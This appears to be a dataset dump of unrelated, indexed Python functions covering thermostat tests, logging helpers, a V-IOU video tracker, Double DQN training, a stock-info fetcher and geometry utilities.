async def test_temp_change_ac_trigger_on_not_long_enough_2(hass, setup_comp_5): """Test if temperature change turn ac on.""" calls = _setup_switch(hass, False) await common.async_set_temperature(hass, 25) _setup_sensor(hass, 30) await hass.async_block_till_done() assert 0 == len(calls)
29,443
def get_MB_compatible_list(OpClass, lhs, rhs): """ return a list of metablock instance implementing an operation of type OpClass and compatible with format descriptor @p lhs and @p rhs """ fct_map = { Addition: get_Addition_MB_compatible_list, Multiplication: get_Multiplication_MB_compatible_list } return fct_map[OpClass](lhs, rhs)
29,444
def create_mock_target(number_of_nodes, number_of_classes): """ Creating a mock target vector. """ return torch.LongTensor([random.randint(0, number_of_classes-1) for node in range(number_of_nodes)])
29,445
def is_iterable(obj): """ Return true if object has iterator but is not a string :param object obj: Any object :return: True if object is iterable but not a string. :rtype: bool """ return hasattr(obj, '__iter__') and not isinstance(obj, str)
29,446
def convert_loglevstr_to_loglevint(loglevstr): """ returns logging.NOTSET if we fail to match string """ if loglevstr.lower() == "critical": return logging.CRITICAL if loglevstr.lower() == "error": return logging.ERROR if loglevstr.lower() == "warning": return logging.WARNING if loglevstr.lower() == "info": return logging.INFO if loglevstr.lower() == "debug": return logging.DEBUG return logging.NOTSET
29,447
def get_operator_module(operator_string): """ Get module name """ # the module, for when the operator is not a local operator operator_path = ".".join(operator_string.split(".")[:-1]) assert len(operator_path) != 0, ( "Please specify a format like 'package.operator' to specify your operator. You passed in '%s'" % operator_string ) return operator_path
29,448
def is_fraction(obj): """Test whether the object is a valid fraction. """ return isinstance(obj, Fraction)
29,449
def getExtrusion(matrix): """calculates DXF-Extrusion = Arbitrary Xaxis and Zaxis vectors """ AZaxis = matrix[2].copy().resize3D().normalize() # = ArbitraryZvector Extrusion = [AZaxis[0],AZaxis[1],AZaxis[2]] if AZaxis[2]==1.0: Extrusion = None AXaxis = matrix[0].copy().resize3D() # = ArbitraryXvector else: threshold = 1.0 / 64.0 if abs(AZaxis[0]) < threshold and abs(AZaxis[1]) < threshold: # AXaxis is the intersection WorldPlane and ExtrusionPlane AXaxis = M_CrossVecs(WORLDY,AZaxis) else: AXaxis = M_CrossVecs(WORLDZ,AZaxis) #print 'deb:\n' #------------- #print 'deb:getExtrusion() Extrusion=', Extrusion #--------- return Extrusion, AXaxis.normalize()
29,450
def _build_class_include(env, class_name): """ If parentns::classname is included and fabric properties such as puppet_parentns__classname_prop = val1 are set, the class included in puppet will be something like class { 'parentns::classname': prop => 'val1', } """ include_def = "class { '%s': \n" % class_name property_prefix = _property_prefix(class_name) for name, value in env.iteritems(): if name.startswith(property_prefix): property_name = name[len(property_prefix):] if not property_name.startswith("_"): # else subclass property include_def += " %s => '%s',\n" % (property_name, value) include_def += "\n}" return include_def
29,451
async def mention_html(user_id, name): """ The function is designed to output a link to a telegram. """ return f'<a href="tg://user?id={user_id}">{escape(name)}</a>'
29,452
def blaze_loader(alias): """ Loader for BlazeDS framework compatibility classes, specifically implementing ISmallMessage. .. seealso:: `BlazeDS (external) <http://opensource.adobe.com/wiki/display/blazeds/BlazeDS>`_ :since: 0.1 """ if alias not in ['DSC', 'DSK', 'DSA']: return from plasma.flex.messaging.messages import small reload(small) return pyamf.get_class_alias(alias)
29,453
def get_user_pic(user_id, table): """[summary] Gets users profile picture Args: user_id ([int]): [User id] table ([string]): [Table target] Returns: [string]: [Filename] """ try: connection = database_cred() cursor = connection.cursor() cursor = connection.cursor(dictionary=True) if table == "admin": cursor.execute( 'SELECT admin_pic FROM admin WHERE admin_id=%s', (user_id,)) if table == "user": cursor.execute( 'SELECT user_pic FROM user WHERE user_id=%s', (user_id,)) records = cursor.fetchall() except Error as e: print("parameterized query failed {}".format(e)) finally: if connection.is_connected(): connection.close() cursor.close() return records
29,454
def convert_file_format(files,size): """ Takes filename queue and returns an example from it using the TF Reader structure """ filename_queue = tf.train.string_input_producer(files,shuffle=True) image_reader = tf.WholeFileReader() _,image_file = image_reader.read(filename_queue) image = tf.image.decode_jpeg(image_file) image = tf.image.resize_images(image, [size,size]) image.set_shape((size,size,3)) return image
29,455
def validate_access_rule(supported_access_types, supported_access_levels, access_rule, abort=False): """Validate an access rule. :param access_rule: Access rules to be validated. :param supported_access_types: List of access types that are regarded valid. :param supported_access_levels: List of access levels that are regarded valid. :param abort: a boolean value that indicates if an exception should be raised whether the rule is invalid. :return: Boolean. """ errmsg = _("Unsupported access rule of 'type' %(access_type)s, " "'level' %(access_level)s, 'to' %(access_to)s: " "%(field)s should be one of %(supported)s.") access_param = access_rule.to_dict() def validate(field, supported_tokens, excinfo): if access_rule['access_%s' % field] in supported_tokens: return True access_param['field'] = field access_param['supported'] = ', '.join( "'%s'" % x for x in supported_tokens) if abort: LOG.error(errmsg, access_param) raise excinfo['type']( **{excinfo['about']: excinfo['details'] % access_param}) else: LOG.warning(errmsg, access_param) return False valid = True valid &= validate( 'type', supported_access_types, {'type': exception.InvalidShareAccess, 'about': "reason", 'details': _( "%(access_type)s; only %(supported)s access type is allowed")}) valid &= validate( 'level', supported_access_levels, {'type': exception.InvalidShareAccessLevel, 'about': "level", 'details': "%(access_level)s"}) return valid
29,456
def track_viou_video(video_path, detections, sigma_l, sigma_h, sigma_iou, t_min, ttl, tracker_type, keep_upper_height_ratio): """ V-IOU Tracker. See "Extending IOU Based Multi-Object Tracking by Visual Information by E. Bochinski, T. Senst, T. Sikora" for more information. Args: frames_path (str): path to ALL frames. string must contain a placeholder like {:07d} to be replaced with the frame numbers. detections (list): list of detections per frame, usually generated by util.load_mot sigma_l (float): low detection threshold. sigma_h (float): high detection threshold. sigma_iou (float): IOU threshold. t_min (float): minimum track length in frames. ttl (float): maximum number of frames to perform visual tracking. this can fill 'gaps' of up to 2*ttl frames (ttl times forward and backward). tracker_type (str): name of the visual tracker to use. see VisTracker for more details. keep_upper_height_ratio (float): float between 0.0 and 1.0 that determines the ratio of height of the object to track to the total height of the object used for visual tracking. Returns: list: list of tracks. """ if tracker_type == 'NONE': assert ttl == 1, "ttl should not be larger than 1 if no visual tracker is selected" tracks_active = [] tracks_extendable = [] tracks_finished = [] frame_buffer = [] vid = cv2.VideoCapture(video_path) if not vid.isOpened(): raise IOError("Couldn't open webcam or video") for frame_num, detections_frame in enumerate(tqdm(detections), start=1): # load frame and put into buffer # frame_path = frames_path.format(frame_num) # frame = cv2.imread(frame_path) return_value, frame = vid.read() if return_value != True: break if return_value: # frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # image = Image.fromarray(frame) # print('image:',image) pass else: raise ValueError("No image!") assert frame is not None, "could not read '{}'".format(frame_path) frame_buffer.append(frame) if len(frame_buffer) > ttl + 1: frame_buffer.pop(0) # apply low threshold to detections dets = [det for det in detections_frame if det['score'] >= sigma_l] track_ids, det_ids = associate(tracks_active, dets, sigma_iou) updated_tracks = [] for track_id, det_id in zip(track_ids, det_ids): tracks_active[track_id]['bboxes'].append(dets[det_id]['bbox']) tracks_active[track_id]['max_score'] = max(tracks_active[track_id]['max_score'], dets[det_id]['score']) tracks_active[track_id]['classes'].append(dets[det_id]['class']) tracks_active[track_id]['det_counter'] += 1 if tracks_active[track_id]['ttl'] != ttl: # reset visual tracker if active tracks_active[track_id]['ttl'] = ttl tracks_active[track_id]['visual_tracker'] = None updated_tracks.append(tracks_active[track_id]) tracks_not_updated = [tracks_active[idx] for idx in set(range(len(tracks_active))).difference(set(track_ids))] for track in tracks_not_updated: if track['ttl'] > 0: if track['ttl'] == ttl: # init visual tracker track['visual_tracker'] = VisTracker(tracker_type, track['bboxes'][-1], frame_buffer[-2], keep_upper_height_ratio) # viou forward update ok, bbox = track['visual_tracker'].update(frame) if not ok: # visual update failed, track can still be extended tracks_extendable.append(track) continue track['ttl'] -= 1 track['bboxes'].append(bbox) updated_tracks.append(track) else: tracks_extendable.append(track) # update the list of extendable tracks. tracks that are too old are moved to the finished_tracks. this should # not be necessary but may improve the performance for large numbers of tracks (eg. for mot19) tracks_extendable_updated = [] for track in tracks_extendable: if track['start_frame'] + len(track['bboxes']) + ttl - track['ttl'] >= frame_num: tracks_extendable_updated.append(track) elif track['max_score'] >= sigma_h and track['det_counter'] >= t_min: tracks_finished.append(track) tracks_extendable = tracks_extendable_updated new_dets = [dets[idx] for idx in set(range(len(dets))).difference(set(det_ids))] dets_for_new = [] for det in new_dets: finished = False # go backwards and track visually boxes = [] vis_tracker = VisTracker(tracker_type, det['bbox'], frame, keep_upper_height_ratio) for f in reversed(frame_buffer[:-1]): ok, bbox = vis_tracker.update(f) if not ok: # can not go further back as the visual tracker failed break boxes.append(bbox) # sorting is not really necessary but helps to avoid different behaviour for different orderings # preferring longer tracks for extension seems intuitive, LAP solving might be better for track in sorted(tracks_extendable, key=lambda x: len(x['bboxes']), reverse=True): offset = track['start_frame'] + len(track['bboxes']) + len(boxes) - frame_num # association not optimal (LAP solving might be better) # association is performed at the same frame, not adjacent ones if 1 <= offset <= ttl - track['ttl'] and iou(track['bboxes'][-offset], bbox) >= sigma_iou: if offset > 1: # remove existing visually tracked boxes behind the matching frame track['bboxes'] = track['bboxes'][:-offset+1] track['bboxes'] += list(reversed(boxes))[1:] track['bboxes'].append(det['bbox']) track['max_score'] = max(track['max_score'], det['score']) track['classes'].append(det['class']) track['ttl'] = ttl track['visual_tracker'] = None tracks_extendable.remove(track) if track in tracks_finished: del tracks_finished[tracks_finished.index(track)] updated_tracks.append(track) finished = True break if finished: break if not finished: dets_for_new.append(det) # create new tracks new_tracks = [{'bboxes': [det['bbox']], 'max_score': det['score'], 'start_frame': frame_num, 'ttl': ttl, 'classes': [det['class']], 'det_counter': 1, 'visual_tracker': None} for det in dets_for_new] tracks_active = [] for track in updated_tracks + new_tracks: if track['ttl'] == 0: tracks_extendable.append(track) else: tracks_active.append(track) # finish all remaining active and extendable tracks tracks_finished = tracks_finished + \ [track for track in tracks_active + tracks_extendable if track['max_score'] >= sigma_h and track['det_counter'] >= t_min] # remove last visually tracked frames and compute the track classes for track in tracks_finished: if ttl != track['ttl']: track['bboxes'] = track['bboxes'][:-(ttl - track['ttl'])] track['class'] = max(set(track['classes']), key=track['classes'].count) del track['visual_tracker'] # debug # print(data) f = open('debug.txt', 'w') f.write(str(tracks_finished)) f.close() return tracks_finished
29,457
def deduplicate(inp: SHAPE) -> SHAPE: """ Remove duplicates from any iterable while retaining the order of elements. :param inp: iterable to deduplicate :return: new, unique iterable of same type as input """ return type(inp)(dict.fromkeys(list(inp)))
29,458
def access_rules_synchronized(f): """Decorator for synchronizing share access rule modification methods.""" def wrapped_func(self, *args, **kwargs): # The first argument is always a share, which has an ID key = "share-access-%s" % args[0]['id'] @utils.synchronized(key) def source_func(self, *args, **kwargs): return f(self, *args, **kwargs) return source_func(self, *args, **kwargs) return wrapped_func
29,459
def import_python(path, package=None): """Get python module or object. Parameters ---------- path : str Fully-qualified python path, i.e. `package.module:object`. package : str or None Package name to use as an anchor if `path` is relative. """ parts = path.split(':') if len(parts) > 2: msg = f"Not a correct path ('{path}' has more than one object qualifier)" raise ValueError(msg) if len(parts) == 2: module_path, obj = parts else: module_path, obj = path, None module = import_module(module_path, package=package) if obj: return getattr(module, obj) return module
29,460
async def feature_flags_scope_per_request( request: Request, call_next: Callable[[Request], Awaitable[Response]] ) -> Response: """Use new feature flags copy for each request.""" # Create new copy of the feature flags, as we'll be modifying them later # and do not want to change our system-wide feature flags. with ff_ctx as feature_flags: # FastAPI provides its own dependency injection mechanism, but just # in case you are using starlette directly or there any other pure # ASGI middlewares. request.scope["feature_flags"] = feature_flags return await call_next(request)
29,461
def test_md034_good_http_url_in_inline_link(): """ Test to make sure this rule does not trigger with a document that contains http urls in inline links. """ # Arrange scanner = MarkdownScanner() supplied_arguments = [ "scan", "test/resources/rules/md034/good_http_url_in_inline_link.md", ] expected_return_code = 0 expected_output = "" expected_error = "" # Act execute_results = scanner.invoke_main(arguments=supplied_arguments) # Assert execute_results.assert_results( expected_output, expected_error, expected_return_code )
29,462
def fakepulsar(parfile, obstimes, toaerr, freq=1440.0, observatory="AXIS", flags="", iters=3): """Returns a libstempo tempopulsar object corresponding to a noiseless set of observations for the pulsar specified in 'parfile', with observations happening at times (MJD) given in the array (or list) 'obstimes', with measurement errors given by toaerr (us). A new timfile can then be saved with pulsar.savetim(). Re the other parameters: - 'toaerr' needs to be either a common error, or a list of errors of the same length of 'obstimes'; - 'freq' can be either a common observation frequency in MHz, or a list; it defaults to 1440; - 'observatory' can be either a common observatory name, or a list; it defaults to the IPTA MDC 'AXIS'; - 'flags' can be a string (such as '-sys EFF.EBPP.1360') or a list of strings; it defaults to an empty string; - 'iters' is the number of iterative removals of computed residuals from TOAs (which is how the fake pulsar is made...)""" import tempfile outfile = tempfile.NamedTemporaryFile(delete=False) outfile.write(b"FORMAT 1\n") outfile.write(b"MODE 1\n") obsname = "fake_" + os.path.basename(parfile) if obsname[-4:] == ".par": obsname = obsname[:-4] for i, t in enumerate(obstimes): outfile.write( "{0} {1} {2} {3} {4} {5}\n".format( obsname, _geti(freq, i), t, _geti(toaerr, i), _geti(observatory, i), _geti(flags, i) ).encode("ascii") ) timfile = outfile.name outfile.close() pulsar = libstempo.tempopulsar(parfile, timfile, dofit=False) for i in range(iters): pulsar.stoas[:] -= pulsar.residuals() / 86400.0 pulsar.formbats() os.remove(timfile) return pulsar
29,463
def get_scenes_need_processing(config_file, sensors): """ A function which finds all the processing steps for all the scenes which haven't yet been undertaken. This is per scene processing rather than per step processing in the functions above. Steps include: * Download * ARD Production * Generating Tile Cache * Generating Quicklook images :param config_file: The EODataDown configuration file path. :param sensors: list of sensor string names to be processed. :returns: a list of lists where each scn has [config_file, scn_sensor, scn_id] """ sys_main_obj = eodatadown.eodatadownsystemmain.EODataDownSystemMain() sys_main_obj.parse_config(config_file) tasks = [] for sensor in sensors: sensor_obj = sys_main_obj.get_sensor_obj(sensor) scn_ids = [] if sensor_obj.calc_scn_usr_analysis(): scns = sensor_obj.get_scnlist_usr_analysis() for scn in scns: if scn not in scn_ids: tasks.append([config_file, sensor, scn]) scn_ids.append(scn) if sensor_obj.calc_scn_tilecache(): scns = sensor_obj.get_scnlist_quicklook() for scn in scns: if scn not in scn_ids: tasks.append([config_file, sensor, scn]) scn_ids.append(scn) if sensor_obj.calc_scn_quicklook(): scns = sensor_obj.get_scnlist_tilecache() for scn in scns: if scn not in scn_ids: tasks.append([config_file, sensor, scn]) scn_ids.append(scn) scns = sensor_obj.get_scnlist_con2ard() for scn in scns: if scn not in scn_ids: tasks.append([config_file, sensor, scn]) scn_ids.append(scn) scns = sensor_obj.get_scnlist_download() for scn in scns: if scn not in scn_ids: tasks.append([config_file, sensor, scn]) scn_ids.append(scn) return tasks
29,464
def Double_DQN(env, memory, q_net, t_net, optim, steps = 10000, eps = 1, disc_factor = 0.99, loss = torch.nn.MSELoss(), batch_sz = 128, tgt_update = 10, early = True, eps_decay = lambda eps, steps, step: eps - eps/steps, act = lambda s, eps, env, q_net: torch.tensor(env.action_space.sample()) if torch.rand(1) < eps else q_net(s).max(0)[1]): """ Trains a neural network with Deep Q-Network algorithm Args: env : openai gym environment memory : Memory used to store samples, import from py_inforce.Generic.Memories q_net : Neural Network to train, import from py_inforce.Generic.MLP t_net : Target Net, copy of q_net optim : Pytorch optimizer for q_net steps : Integer, Max number of samples to collect. Default = 10_000 eps : Float, probability for epsilon greedy policy Default = 1 disc_factor : Float, Discount factor aka gamma Default = 0.99 loss : Pytorch compatible loss function Default = torch.nn.MSELoss() batch_sz : Int, number of samples for gradient descent tgt_updat : Int, number of samples between update of t_net early : Bool, indicates if conditions for early termination should be checked. At the moment the early termination is hardwired for the CartPole-v0 environment Default = True eps_decay : Function of eps, steps and the current step, computes decayed epsilon Default = linear decay from 1 to 0 against steps act : Function of env state s, eps and env, determines action Default = Epsilon greedy Note: Based on arXiv:1509.06461 """ optimizer = optim(q_net.parameters(), lr = q_net.lr) s = torch.tensor(env.reset(), dtype=torch.float32) for step in range(steps): a = act(s, eps, env, q_net) s_prime, r, done, _ = env.step(a.numpy()) s_prime = torch.tensor(s_prime, dtype=torch.float32) eps = eps_decay(eps, steps, step) memory.push(s, a, r, s_prime, done) # Optimize if step >= batch_sz: s_, a_, r_, s_p, d_ = memory.sample(batch_sz) y = r_ + disc_factor * t_net(s_p).max(1)[0] * (1 - d_) predictions = q_net(s_).gather(1, a_.long()).flatten() l = loss(y, predictions) optimizer.zero_grad() l.backward() optimizer.step() if step % tgt_update == 0: t_net.load_state_dict(q_net.state_dict()) # Test for early break if early and done: ret = 0 for _ in range(100): done = False state = torch.tensor(env.reset(), dtype=torch.float32) while not done: s, r, done, _ = env.step(torch.argmax(q_net(s)).numpy()) s = torch.tensor(s, dtype=torch.float32) ret += r if 195 <= ret/100: print('converged in %i steps' %step) break s = torch.tensor(env.reset(), dtype=torch.float32) if done else s_prime
29,465
def startingStateDistribution(env, N=100000): """ This function samples initial states for the environment and computes an empirical estimator for the starting distribution mu_0 """ rdInit = [] sample = {} # Computing the starting state distribution mu_0 = np.zeros((env.n_states,1)) for i in range(N): rdInit.append(env.reset()) for i in range(0, env.n_states): sample[i] = rdInit.count(i) mu_0[i] = sample[i]/N return mu_0
29,466
def get_shapley(csv_filename, modalities = ["t1", "t1ce", "t2", "flair"]): """ calculate modality shapeley value CSV with column: t1, t1c, t2, flair, of 0 / 1. and perforamnce value. :param csv: :return: """ # convert csv to dict: {(0, 0, 1, 0): 10} {tuple: performance} df = pd.read_csv(csv_filename) fold = Path(csv_filename).name.split('.')[0].split('_')[-1] # print(fold) df_dict = df.to_dict(orient='records') # print(df_dict) v_dict = {} # for row in df_dict: mod_lst = [] for m in modalities: mod_lst.append(row[m]) v_dict[tuple(mod_lst)] = row['accuracy'] # print(v_dict) n = len(modalities) # sanity check if all mod combinations are exists N_sets = list(itertools.product([0,1],repeat = len(modalities))) # set of all_combinations for s in N_sets: if tuple(s) not in v_dict: print("ERROR in get_shapley! {} missing".format(s)) N_sets_array = np.array(N_sets) # array([[0, 0, 0, 0], [0, 0, 0, 1], mod_shapley = {} # for each mod, calculate its shapley value: for i, mod in enumerate(modalities): # get combination not including mod n_not_i = N_sets_array[N_sets_array[:, i]==0]# # a list containing all subsets that don't contains i todo # print(n_not_i, i) phi_i= 0 for s in n_not_i: # print('s', s) v_s = v_dict[tuple(s)] sANDi = copy.deepcopy(s) sANDi[i] =1 v_sANDi = v_dict[tuple(sANDi)] # print(s , s.sum(), i, mod) phi_i += (v_sANDi - v_s) * math.factorial(s.sum()) * (math.factorial(n - s.sum() - 1)) / math.factorial(n) mod_shapley[mod] = phi_i mod_shapley['fold'] = fold print(mod_shapley) # save gt shapley to csv with open(Path(csv_filename).parent/'fold_{}_modality_shapley.csv'.format(fold), 'w') as f: csv_writer = csv.DictWriter(f, fieldnames=list(mod_shapley.keys())) csv_writer.writeheader() csv_writer.writerow(mod_shapley) # for key in mod_shapley.keys(): # f.write("%s,%s\n" % (key, mod_shapley[key])) return mod_shapley
29,467
def reload_all(): """ Resets all modules to the state they were in right after import_all returned. """ import renpy.style import renpy.display # Clear all pending exceptions. sys.exc_clear() # Reset the styles. renpy.style.reset() # @UndefinedVariable # Shut down the cache thread. renpy.display.im.cache.quit() # Shut down the importer. renpy.loader.quit_importer() # Free memory. renpy.exports.free_memory() # GC renders. renpy.display.render.screen_render = None renpy.display.render.mark_sweep() # Get rid of the draw module and interface. renpy.display.draw.deinit() renpy.display.draw = None renpy.display.interface = None # Delete the store modules. for i in sys.modules.keys(): if i.startswith("store") or i == "renpy.store": m = sys.modules[i] if m is not None: m.__dict__.reset() del sys.modules[i] # Restore the state of all modules from backup. backup.restore() renpy.display.im.reset_module() post_import() # Re-initialize the importer. renpy.loader.init_importer()
29,468
def quest_13(_x): """ Sample data for 1000 cells, with 200 genes, and 8 cell types. Cluster the data with k-means (k = 8) """ plt.subplot(121) plt.imshow(np.log(_x), cmap="binary", interpolation="nearest") plt.ylabel('Genes') plt.xlabel('Cells') plt.xlim(0,200) plt.ylim(0,200) plt.show() plt.subplot(122) kmeans = KMeans( n_clusters=8) k_pred = kmeans.fit_predict(_x.T) plt.imshow(np.log(_x.T[np.argsort(k_pred)].T), cmap="binary", interpolation="nearest") plt.ylabel('Genes') plt.xlabel('Cells') plt.xlim(0,200) plt.ylim(0,200) plt.show()
29,469
def demo_eval(chunkparser, text): """ Demonstration code for evaluating a chunk parser, using a ``ChunkScore``. This function assumes that ``text`` contains one sentence per line, and that each sentence has the form expected by ``tree.chunk``. It runs the given chunk parser on each sentence in the text, and scores the result. It prints the final score (precision, recall, and f-measure); and reports the set of chunks that were missed and the set of chunks that were incorrect. (At most 10 missing chunks and 10 incorrect chunks are reported). :param chunkparser: The chunkparser to be tested :type chunkparser: ChunkParserI :param text: The chunked tagged text that should be used for evaluation. :type text: str """ from nltk import chunk from nltk.tree import Tree # Evaluate our chunk parser. chunkscore = chunk.ChunkScore() for sentence in text.split("\n"): print(sentence) sentence = sentence.strip() if not sentence: continue gold = chunk.tagstr2tree(sentence) tokens = gold.leaves() test = chunkparser.parse(Tree("S", tokens), trace=1) chunkscore.score(gold, test) print() print("/" + ("=" * 75) + "\\") print("Scoring", chunkparser) print("-" * 77) print("Precision: %5.1f%%" % (chunkscore.precision() * 100), " " * 4, end=" ") print("Recall: %5.1f%%" % (chunkscore.recall() * 100), " " * 6, end=" ") print("F-Measure: %5.1f%%" % (chunkscore.f_measure() * 100)) # Missed chunks. if chunkscore.missed(): print("Missed:") missed = chunkscore.missed() for chunk in missed[:10]: print(" ", " ".join(map(str, chunk))) if len(chunkscore.missed()) > 10: print(" ...") # Incorrect chunks. if chunkscore.incorrect(): print("Incorrect:") incorrect = chunkscore.incorrect() for chunk in incorrect[:10]: print(" ", " ".join(map(str, chunk))) if len(chunkscore.incorrect()) > 10: print(" ...") print("\\" + ("=" * 75) + "/") print()
29,470
def get_changepoint_values_from_config( changepoints_dict, time_features_df, time_col=cst.TIME_COL): """Applies the changepoint method specified in `changepoints_dict` to return the changepoint values :param changepoints_dict: Optional[Dict[str, any]] Specifies the changepoint configuration. "method": str The method to locate changepoints. Valid options: "uniform". Places n_changepoints evenly spaced changepoints to allow growth to change. "custom". Places changepoints at the specified dates. Additional keys to provide parameters for each particular method are described below. "continuous_time_col": Optional[str] Column to apply `growth_func` to, to generate changepoint features Typically, this should match the growth term in the model "growth_func": Optional[func] Growth function (scalar -> scalar). Changepoint features are created by applying `growth_func` to "continuous_time_col" with offsets. If None, uses identity function to use `continuous_time_col` directly as growth term If changepoints_dict["method"] == "uniform", this other key is required: "n_changepoints": int number of changepoints to evenly space across training period If changepoints_dict["method"] == "custom", this other key is required: "dates": Iterable[Union[int, float, str, datetime]] Changepoint dates. Must be parsable by pd.to_datetime. Changepoints are set at the closest time on or after these dates in the dataset. :param time_features_df: pd.Dataframe training dataset. contains column "continuous_time_col" :param time_col: str The column name in `time_features_df` representing time for the time series data The time column can be anything that can be parsed by pandas DatetimeIndex Used only in the "custom" method. :return: np.array values of df[continuous_time_col] at the changepoints """ changepoint_values = None if changepoints_dict is not None: valid_changepoint_methods = ["uniform", "custom"] changepoint_method = changepoints_dict.get("method") continuous_time_col = changepoints_dict.get("continuous_time_col") if changepoint_method is None: raise Exception("changepoint method must be specified") if changepoint_method not in valid_changepoint_methods: raise NotImplementedError( f"changepoint method {changepoint_method} not recognized. " f"Must be one of {valid_changepoint_methods}") if changepoint_method == "uniform": if changepoints_dict["n_changepoints"] > 0: params = {"continuous_time_col": continuous_time_col} if continuous_time_col is not None else {} changepoint_values = get_evenly_spaced_changepoints_values( df=time_features_df, n_changepoints=changepoints_dict["n_changepoints"], **params) elif changepoint_method == "custom": params = {} if time_col is not None: params["time_col"] = time_col if continuous_time_col is not None: params["continuous_time_col"] = continuous_time_col changepoint_values = get_custom_changepoints_values( df=time_features_df, changepoint_dates=changepoints_dict["dates"], **params) return changepoint_values
29,471
def jitChol(A, maxTries=10, warning=True): """Do a Cholesky decomposition with jitter. Description: U, jitter = jitChol(A, maxTries, warning) attempts a Cholesky decomposition on the given matrix, if matrix isn't positive definite the function adds 'jitter' and tries again. Thereafter the amount of jitter is multiplied by 10 each time it is added again. This is continued for a maximum of 10 times. The amount of jitter added is returned. Returns: U - the Cholesky decomposition for the matrix. jitter - the amount of jitter that was added to the matrix. Arguments: A - the matrix for which the Cholesky decomposition is required. maxTries - the maximum number of times that jitter is added before giving up (default 10). warning - whether to give a warning for adding jitter (default is True) See also CHOL, PDINV, LOGDET Copyright (c) 2005, 2006 Neil D. Lawrence """ jitter = 0 i = 0 while(True): try: # Try --- need to check A is positive definite if jitter == 0: jitter = abs(SP.trace(A))/A.shape[0]*1e-6 LC = linalg.cholesky(A, lower=True) return LC.T, 0.0 else: if warning: # pdb.set_trace() # plt.figure() # plt.imshow(A, interpolation="nearest") # plt.colorbar() # plt.show() logging.error("Adding jitter of %f in jitChol()." % jitter) LC = linalg.cholesky(A+jitter*SP.eye(A.shape[0]), lower=True) return LC.T, jitter except linalg.LinAlgError: # Seems to have been non-positive definite. if i<maxTries: jitter = jitter*10 else: raise linalg.LinAlgError, "Matrix non positive definite, jitter of " + str(jitter) + " added but failed after " + str(i) + " trials." i += 1 return LC
29,472
def stock_individual_info_em(symbol: str = "603777") -> pd.DataFrame: """ 东方财富-个股-股票信息 http://quote.eastmoney.com/concept/sh603777.html?from=classic :param symbol: 股票代码 :type symbol: str :return: 股票信息 :rtype: pandas.DataFrame """ code_id_dict = code_id_map_em() url = "http://push2.eastmoney.com/api/qt/stock/get" params = { 'ut': 'fa5fd1943c7b386f172d6893dbfba10b', 'fltt': '2', 'invt': '2', 'fields': 'f120,f121,f122,f174,f175,f59,f163,f43,f57,f58,f169,f170,f46,f44,f51,f168,f47,f164,f116,f60,f45,f52,f50,f48,f167,f117,f71,f161,f49,f530,f135,f136,f137,f138,f139,f141,f142,f144,f145,f147,f148,f140,f143,f146,f149,f55,f62,f162,f92,f173,f104,f105,f84,f85,f183,f184,f185,f186,f187,f188,f189,f190,f191,f192,f107,f111,f86,f177,f78,f110,f262,f263,f264,f267,f268,f255,f256,f257,f258,f127,f199,f128,f198,f259,f260,f261,f171,f277,f278,f279,f288,f152,f250,f251,f252,f253,f254,f269,f270,f271,f272,f273,f274,f275,f276,f265,f266,f289,f290,f286,f285,f292,f293,f294,f295', "secid": f"{code_id_dict[symbol]}.{symbol}", '_': '1640157544804', } r = requests.get(url, params=params) data_json = r.json() temp_df = pd.DataFrame(data_json) temp_df.reset_index(inplace=True) del temp_df['rc'] del temp_df['rt'] del temp_df['svr'] del temp_df['lt'] del temp_df['full'] code_name_map = { 'f57': '股票代码', 'f58': '股票简称', 'f84': '总股本', 'f85': '流通股', 'f127': '行业', 'f116': '总市值', 'f117': '流通市值', 'f189': '上市时间', } temp_df['index'] = temp_df['index'].map(code_name_map) temp_df = temp_df[pd.notna(temp_df['index'])] if 'dlmkts' in temp_df.columns: del temp_df['dlmkts'] temp_df.columns = [ 'item', 'value', ] temp_df.reset_index(inplace=True, drop=True) return temp_df
29,473
def InverseDynamicsTool_safeDownCast(obj): """ InverseDynamicsTool_safeDownCast(OpenSimObject obj) -> InverseDynamicsTool Parameters ---------- obj: OpenSim::Object * """ return _tools.InverseDynamicsTool_safeDownCast(obj)
29,474
def in_incident_root(current_dir_path): """ Helper function to determine if a sub directory is a child of an incident directory. This is useful for setting default params in tools that has an incident directory as an input :param current_dir_path: String of the path being evaluated :return: tuple of (parent directory path, boolean indicating if the parent directory matches the incident dir pattern) """ parent_dir_path, current_dir_name = os.path.split(current_dir_path) is_root_dir = False if current_dir_name == 'tools': parent_dir_name = os.path.basename(parent_dir_path) if re.match(r'\d{4}_[a-zA-Z]*', parent_dir_name): is_root_dir = True return parent_dir_path.lower(), is_root_dir
29,475
def build_decoder(encoding_dim,sparse): """"build and return the decoder linked with the encoder""" input_img = Input(shape=(28*28,)) encoder = build_encoder(encoding_dim,sparse) input_encoded = encoder(input_img) decoded = Dense(64, activation='relu')(input_encoded) decoded = Dense(128, activation='relu')(decoded) decoded = Dense(28*28,activation='relu')(decoded) decoder = Model(input_img,decoded) return decoder
29,476
def find_usable_exits(room, stuff): """ Given a room, and the player's stuff, find a list of exits that they can use right now. That means the exits must not be hidden, and if they require a key, the player has it. RETURNS - a list of exits that are visible (not hidden) and don't require a key! """ usable = [] missing_key = [] for exit in room['exits']: if exit.get("hidden", False): continue if "required_key" in exit: if exit["required_key"] in stuff: usable.append(exit) continue else: missing_key.append(exit) usable.append(exit) continue continue usable.append(exit) return usable, missing_key
29,477
def test_1_1_1_4_file_mode(host): """ CIS Ubuntu 20.04 v1.0.0 - Rule # 1.1.1.4 Tests if /etc/modprobe.d/1.1.1.4_hfs.conf has 0644 mode """ assert host.file(HFS_MOD_FILE).mode == 0o644
29,478
def get_normal_map(x, area_weighted=False): """ x: [bs, h, w, 3] (x,y,z) -> (nx,ny,nz) """ nn = 6 p11 = x p = tf.pad(x, tf.constant([[0,0], [1,1], [1,1], [0,0]])) p11 = p[:, 1:-1, 1:-1, :] p10 = p[:, 1:-1, 0:-2, :] p01 = p[:, 0:-2, 1:-1, :] p02 = p[:, 0:-2, 2:, :] p12 = p[:, 1:-1, 2:, :] p20 = p[:, 2:, 0:-2, :] p21 = p[:, 2:, 1:-1, :] pos = [p10, p01, p02, p12, p21, p20] for i in range(nn): pos[i] = tf.subtract(pos[i], p11) normals = [] for i in range(1, nn): normals.append(tf.cross(pos[i%nn], pos[(i-1+nn)%nn])) normal = tf.reduce_sum(tf.stack(normals), axis=0) if not area_weighted: normal = tf.nn.l2_normalize(normal, 3) normal = tf.where(tf.is_nan(normal), tf.zeros_like(normal), normal) return normal
29,479
